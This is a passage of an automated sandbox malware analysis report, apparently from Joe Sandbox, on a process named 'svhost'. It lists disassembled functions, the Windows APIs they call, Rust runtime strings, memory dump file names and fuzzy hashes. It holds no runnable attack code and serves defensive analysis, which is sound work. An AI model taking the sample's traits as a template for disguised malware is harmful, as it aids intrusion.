                                • Instruction Fuzzy Hash: 0D52F766E19BC684F7229F3998023F8A314FF6B7D8F415336EE896AA56CF345241C314
                                Function 00007FF7AF69CD60 Relevance: 3.1, APIs: 2, Instructions: 60filenativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtCancelIoFileEx.NTDLL ref: 00007FF7AF69CDF3
                                  • Part of subcall function 00007FF7AF537C10: CloseHandle.KERNEL32(?,?,00000001,00007FF7AF69C5EF,?,?,?,?,00000000,00007FF7AF8820B0,?,?,00007FF7AF69884F,?,?,00007FF7AF699AD1), ref: 00007FF7AF537C1C
                                • RtlNtStatusToDosError.NTDLL ref: 00007FF7AF69CE28
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: CancelCloseErrorFileHandleStatus
                                • String ID:
                                • API String ID: 1886700106-0
                                • Opcode ID: 5ba96540dfc7eb43cde4bcfbc4a40b9e8c26d73a07e0bc47f9115e3fb26d0a69
                                • Instruction ID: a17ab8a3110bf3e24e274d77e3c51086ccbe5c619ce9e9134092f3b4c27e18ec
                                • Opcode Fuzzy Hash: 5ba96540dfc7eb43cde4bcfbc4a40b9e8c26d73a07e0bc47f9115e3fb26d0a69
                                • Instruction Fuzzy Hash: 82217322A0968286F771AE25D4443F9A7A5E704764F956371CBEE067F0CF3CE489C390
                                Function 00007FF7AF698930 Relevance: 3.0, APIs: 2, Instructions: 35filenativeCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: CancelFile
                                • String ID:
                                • API String ID: 2872239956-0
                                • Opcode ID: 9cf71b0262dad0dd7af635415a03bf81218a99c57c085262d0b5f7230ab8d858
                                • Instruction ID: f0b04b3c52e7f41e34877f8251deabc89d5831500f493a3fce80163c8ef168c9
                                • Opcode Fuzzy Hash: 9cf71b0262dad0dd7af635415a03bf81218a99c57c085262d0b5f7230ab8d858
                                • Instruction Fuzzy Hash: B1018C62A096D286EB31AB28E0883A9E792E750709F8A1071D3CD066B1DBBDD589C311
                                Function 00007FF7AF71B500 Relevance: 2.9, Strings: 2, Instructions: 358COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: 0x00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899$library\core\src\fmt\mod.rsassertion failed: edelta >= 0library\core\src\num\diy_float.rs
                                • API String ID: 0-1407526028
                                • Opcode ID: 59d5fc6032068b16ee3255b5553b0f8c1455613fcfd46b80750ac1e6ec4e9574
                                • Instruction ID: f643bbf4ec90908293fd55ff4b6a4f80b07b7c1edb8b400b400cc573433995e2
                                • Opcode Fuzzy Hash: 59d5fc6032068b16ee3255b5553b0f8c1455613fcfd46b80750ac1e6ec4e9574
                                • Instruction Fuzzy Hash: 0DD15A2AA0EAD180EB65E718E0103F9A361EB9D790FC25236CD8E17BF0DE2CD509C715
                                Function 00007FF7AF6DF5B0 Relevance: 2.7, Strings: 2, Instructions: 210COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: arenegyl$setybdet
                                • API String ID: 0-2199462733
                                • Opcode ID: 7817050a56b15dea10cb04a68d25a8dea9cab9e99b91f9df2897490584283386
                                • Instruction ID: 9a62dcca3b2d5ad063a6f1397220b7df025594d32c48dad19aa8424208acf75a
                                • Opcode Fuzzy Hash: 7817050a56b15dea10cb04a68d25a8dea9cab9e99b91f9df2897490584283386
                                • Instruction Fuzzy Hash: 01713623B01AA181F791AF69A9017EB7B71B748798FC46426DE4C433A1DF38D692C310
                                Function 00007FF7AF633DC0 Relevance: 1.8, Strings: 1, Instructions: 555COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: requested capacity too large
                                • API String ID: 0-2407941311
                                • Opcode ID: 66de6f382f8876072ac98098e08a22dfce46a6131ac32e3b9ea378632ab2c969
                                • Instruction ID: 7a09ed2061256bc510d69d1e0d596dfd6c2846ef5ffeb88ca8bf14c894da6ebf
                                • Opcode Fuzzy Hash: 66de6f382f8876072ac98098e08a22dfce46a6131ac32e3b9ea378632ab2c969
                                • Instruction Fuzzy Hash: 9C223862B0A6D281EB18AB1594057F9A76AFB057A4F866735CE5D077E0EF3CE481C310
                                Function 00007FF7AF6C7850 Relevance: 1.8, APIs: 1, Instructions: 297nativeCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: InformationQuerySystem
                                • String ID:
                                • API String ID: 3562636166-0
                                • Opcode ID: 48e4919e59ea12ab8a284a2b64e9b45ee7cb47efa37281456393da8cf583a502
                                • Instruction ID: fe3923a29a36570033ad875f02743a879c17ac8986565eb5d6badc14e98e896b
                                • Opcode Fuzzy Hash: 48e4919e59ea12ab8a284a2b64e9b45ee7cb47efa37281456393da8cf583a502
                                • Instruction Fuzzy Hash: AEE17F32605BC289E7759F25DC487E973A9FB44788F859235CA8C0BB69DF389295C310
                                Function 00007FF7AF5C7060 Relevance: 1.8, Strings: 1, Instructions: 533COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: requested capacity too large
                                • API String ID: 0-2407941311
                                • Opcode ID: 196fe8ac78b57ff97dbbebb6e6b48a2500b37a521a88953eb40c10cfaf72107e
                                • Instruction ID: ce7f2d3ad68781ac1f2d82e2f791efedddc5f0ee80c55ab95d17875ba918edf4
                                • Opcode Fuzzy Hash: 196fe8ac78b57ff97dbbebb6e6b48a2500b37a521a88953eb40c10cfaf72107e
                                • Instruction Fuzzy Hash: 95123662B06A9181EA55AF55A8047F9A760FB44B94F865631DE4E077E0EF3CE083C320
                                Function 00007FF7AF713600 Relevance: 1.5, Strings: 1, Instructions: 279COMMON
                                Download Yara Rule
                                Strings
                                • library\core\src\fmt\mod.rsassertion failed: edelta >= 0library\core\src\num\diy_float.rs, xrefs: 00007FF7AF7139AF
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: library\core\src\fmt\mod.rsassertion failed: edelta >= 0library\core\src\num\diy_float.rs
                                • API String ID: 0-476840127
                                • Opcode ID: d00198ebcbf0e1ae20301edee2ab062c7eed38807a75f4425c6ced863eba7f74
                                • Instruction ID: 39298a3ce39e28f160285907396d3c9584b9408286ce04b96ae1a39973af24eb
                                • Opcode Fuzzy Hash: d00198ebcbf0e1ae20301edee2ab062c7eed38807a75f4425c6ced863eba7f74
                                • Instruction Fuzzy Hash: 50912F36A0AFD641EA916B2594403F9A6957B1CB48FD68530CE4D433F0EE3DD85AC318
                                Function 00007FF7AF6CC740 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: DiskFreeSpace
                                • String ID:
                                • API String ID: 1705453755-0
                                • Opcode ID: f947d3404bd4853cb028095ea15c9361c2a7bb148b56a1ad943ebf02bd7f3d80
                                • Instruction ID: d2edd1d86046ed09ad40a4140c2e0e650d1a2b836c2a35440bfc956c926412c3
                                • Opcode Fuzzy Hash: f947d3404bd4853cb028095ea15c9361c2a7bb148b56a1ad943ebf02bd7f3d80
                                • Instruction Fuzzy Hash: 5BE09B26E1855141E760AF39B4007E69391E784354F894031DECC46774DF78C5C3DB50
                                Function 00007FF7AF702830 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                Download Yara Rule
                                APIs
                                • BCryptGenRandom.BCRYPT(?,?,?,?,?,?,00007FF7AF5B2B7D,?,?,?,00007FF7AF690FCF,?,?,?,?,00007FF7AF67EE70), ref: 00007FF7AF70284F
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: CryptRandom
                                • String ID:
                                • API String ID: 2662593985-0
                                • Opcode ID: 5dddefb8cd93e389fc0011a1002e34324d198abdf18c3fa499e47674e0831993
                                • Instruction ID: 34ddd680fb9f86a24d82c75ce363a7e04cf43a28278a6c2d690b48138e68248d
                                • Opcode Fuzzy Hash: 5dddefb8cd93e389fc0011a1002e34324d198abdf18c3fa499e47674e0831993
                                • Instruction Fuzzy Hash: 20E08619F095C281EA246729A8066AA9760BF9C78CFD04225EE8C02664DD1DD365CB14
                                Function 00007FF7AF6BF9B0 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: chunk size must be non-zero
                                • API String ID: 0-1054586041
                                • Opcode ID: 211455bf9b477fb92bbf9092c66ccc729a276c1b1ce6a6a263735af96b536002
                                • Instruction ID: c320a3b2b94d65a5d8abfeb9084ec60420a86b9a1420f6d9a5b1ee0efca72973
                                • Opcode Fuzzy Hash: 211455bf9b477fb92bbf9092c66ccc729a276c1b1ce6a6a263735af96b536002
                                • Instruction Fuzzy Hash: 41519122A19BC581E6259B29E4403A9B3A5FB98764F549331EEDC037B5EF38D1D5C700
                                Function 00007FF7AF6BF3B0 Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                Download Yara Rule
                                Strings
                                • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/cannot access a Thread Local Storage value during or after destruction/rustc/b11fbfbf351b94c7eecf9e6749a4544a6d4717fa\library\std\src\thread\local.rs, xrefs: 00007FF7AF6BF3F5
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/cannot access a Thread Local Storage value during or after destruction/rustc/b11fbfbf351b94c7eecf9e6749a4544a6d4717fa\library\std\src\thread\local.rs
                                • API String ID: 0-956720722
                                • Opcode ID: 4dfaec11bc7c52bee5e3caf94e8d60f55b649ddc76fdc28bb0c8a1ee790e84e3
                                • Instruction ID: 3a126319f2973e5a5f32a7aa1d732e06039fbf55404f39d351fa7bc5215d651d
                                • Opcode Fuzzy Hash: 4dfaec11bc7c52bee5e3caf94e8d60f55b649ddc76fdc28bb0c8a1ee790e84e3
                                • Instruction Fuzzy Hash: B74186F7A6E1E045D3275B2D081481DBF6A933AF477AA9184EFCF0B352D5124E26E321
                                Function 00007FF7AF7139E0 Relevance: .6, Instructions: 615COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6f5a76b5ae0109dacaf143bd0c1f59de5173ca2915192656de683afd176487bc
                                • Instruction ID: ed47246cecbb447a3d9fbf3160625f8024bde0a5bae9e7f9b56056db3c8fcdc3
                                • Opcode Fuzzy Hash: 6f5a76b5ae0109dacaf143bd0c1f59de5173ca2915192656de683afd176487bc
                                • Instruction Fuzzy Hash: 9022623AE1EEE245F6F06A3155006FEE694AB19748FD64430CD8D436F0DE2EE849D728
                                Function 00007FF7AF70DF00 Relevance: .5, Instructions: 521COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0cc4ab8806bc8b6fcc009916a77ec2ff1115efc673fd91b8ee53fbe353f7a034
                                • Instruction ID: d160ec5304620ed38bc9f92d30ba3b414563fd8230f0e89f69829cd0955bcd94
                                • Opcode Fuzzy Hash: 0cc4ab8806bc8b6fcc009916a77ec2ff1115efc673fd91b8ee53fbe353f7a034
                                • Instruction Fuzzy Hash: 0C22471AE19BE245F712A738BC026FDD750BF5E3D8FC15335EE9912AA6CF2892418250
                                Function 00007FF7AF737470 Relevance: .5, Instructions: 516COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a79a75777a30fcb2ab6927a6d9e324c201172ac973e43ca899b454dd8c49e6f5
                                • Instruction ID: 105c459f36fbde53e2b257004417adf3674caf13167c21e587fb7e5cc9c55a11
                                • Opcode Fuzzy Hash: a79a75777a30fcb2ab6927a6d9e324c201172ac973e43ca899b454dd8c49e6f5
                                • Instruction Fuzzy Hash: 9932256760F7E188DB168B3D50506BC7F61EB26794F5A8366CBF9037D2DA28C246D320
                                Function 00007FF7AF730B90 Relevance: .5, Instructions: 472COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 23c05bf970f5b707a47868c6b671ae553ede6673204f3df67d4d57b015ca67ac
                                • Instruction ID: 4967441c45e876f2a965597f7b064beca4297943fcfa906286cf7a5ff84313ac
                                • Opcode Fuzzy Hash: 23c05bf970f5b707a47868c6b671ae553ede6673204f3df67d4d57b015ca67ac
                                • Instruction Fuzzy Hash: F3128017A0E3D486D74B9B7C08015BDBFA19716B99F6D83A9CFD9023E2C624C126E371
                                Function 00007FF7AF731330 Relevance: .4, Instructions: 437COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7b6b75a7556aec35c5659f692b9f3302bccbbeb09208feee81eddb12989af0e1
                                • Instruction ID: d3566c800c1ec9193c08b13d58e52cbc973c845a274b1f0538885ccd8e74c3b2
                                • Opcode Fuzzy Hash: 7b6b75a7556aec35c5659f692b9f3302bccbbeb09208feee81eddb12989af0e1
                                • Instruction Fuzzy Hash: 48021E26F1ABC192EB159B2894006F8A760BB597A4F958731CFBE137E1EF78D185C310
                                Function 00007FF7AF733430 Relevance: .4, Instructions: 416COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 29100de1a63c6e967cafd4990234b93e6d4a8eb8cd5fe487440f3094c0e5a54c
                                • Instruction ID: 7035e37c44c7e88c284c3f768c34e903399845c03497a52a0ca221fa6a1c1daa
                                • Opcode Fuzzy Hash: 29100de1a63c6e967cafd4990234b93e6d4a8eb8cd5fe487440f3094c0e5a54c
                                • Instruction Fuzzy Hash: 97F175A7A2A7C181EB16DB299404AFCAB64E709764FC69731CEAD473E1DF38C154D320
                                Function 00007FF7AF7188B0 Relevance: .4, Instructions: 386COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b411da6f81d35f2caf219dd427d32d339668f90a59167d110d658ad442584987
